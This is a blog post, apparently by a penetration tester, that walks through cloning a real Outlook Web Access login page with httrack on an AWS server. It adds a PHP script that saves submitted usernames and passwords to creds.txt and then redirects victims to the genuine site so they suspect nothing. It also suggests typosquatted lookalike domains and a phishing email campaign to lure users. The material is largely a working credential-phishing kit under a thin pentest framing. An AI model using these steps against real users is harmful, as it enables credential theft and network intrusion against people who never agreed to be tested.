OWA Website Clone + Credential Grabbing

The purpose of this post is show the necessary steps for cloning an Outlook Web Access (OWA) website and then modifying the cloned website’s code so that the inputted credentials are captured and written to a file when someone attempts to log in. A cloned OWA portal is a good method for obtaining the first set of user login credentials to a network…since the OWA creds will be the same creds needed to login to the Windows network. Once you gain credentials, you may be able to gain access to the internal LAN via Active Directory integrated VPN access, wireless access if WPA2 Enterprise is used, etc.

Before I get started, I need to a place to host the site that I want to clone.  For this example, I’m using an AWS Ubuntu server, running Apache Web Server. Installing Apache is not covered here but the below command will get you most of the way there:

apt-get install apache2 apache2-doc apache2-utils

Once Apache is installed, I need to install httrack. This tool will be used for copying/clone the site. Install by running the below command:

apt-get install httrack

Once httrack is installed, I can clone the site.  For this example, I googled and found and chose a randomly publicly accessible 2013 OWA site at https://mail.h01.hostedmail.net/owa.

Capture1

Before cloning the site, you’ll need to create a place to store it.  I’ve created a new folder named “owa-2013”.  Run the following command:

httrack https://mail.h01.hostedmail.net/owa  -O “/var/www/html/owa-2013/”  -%v -%f

Capture2

Httrack inserts advertising junk into index.html. To eliminate the advertising that comes with using httrack, run the following commands:

Capture3

The above commands basically just move logon5b91.html to the root of owa-2013 and renames that file to index.html so that it’s loaded when you visit the URL/owa-2013.

Since I’m doing this example at AWS, I need to create a couple of rules that allow incoming http and https traffic on ports 443 and 80 to my server.

Capture4

I should now be able to visit the cloned site by visiting the Public IP address of my AWS server/owa-2013.  Since I have domain registered that points to my AWS Public IP, I can browse to https://www.shellgam3.com/owa-2013 to view the cloned site. Note: I’ve setup a certificate on the domain to eliminate the security warning.  In order to purchase/setup a certificate, you’ll need to configure https for Apache and register a domain name. Alternatively, you can also host an encrypted version of the site (http), which eliminates the need for a certificate.

Capture5

Now that I’ve confirmed that the site is publicly visible, I need to rework the source code so that credentials are captured when someone enters them at the website. First, I need to create a PHP file called post.php in /var/www/html/owa-2013 that contains the below code:

<?php $file = ‘creds.txt’;file_put_contents($file, print_r($_POST, true), FILE_APPEND);?><meta http-equiv=”refresh” content=”0; url=https://mail.h01.hostedmail.net/owa”>

Credentials will be written on POST (when the user clicks “sign in”) to the file named creds.txt. After that, the site visitor will be redirected to the actual OWA site that I cloned.  This is important in order to eliminate suspicion.

Now I must modify index.html. Find the line that looks like this:

Capture6

And replace it with:

Capture7

Once completed, credentials should be written to creds.txt when someone attempts to login.

Capture8

When doing something like this on an pentest engagement, consider registering a domain name that is very similar to the organization’s domain name.  For example, if their domain name was firstnationalco.com, you could register firsttnationalco.com in hopes that the target(s) wouldn’t notice the difference.

How to trick someone into viewing the cloned site is not covered here but consider an social engineering email campaign.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s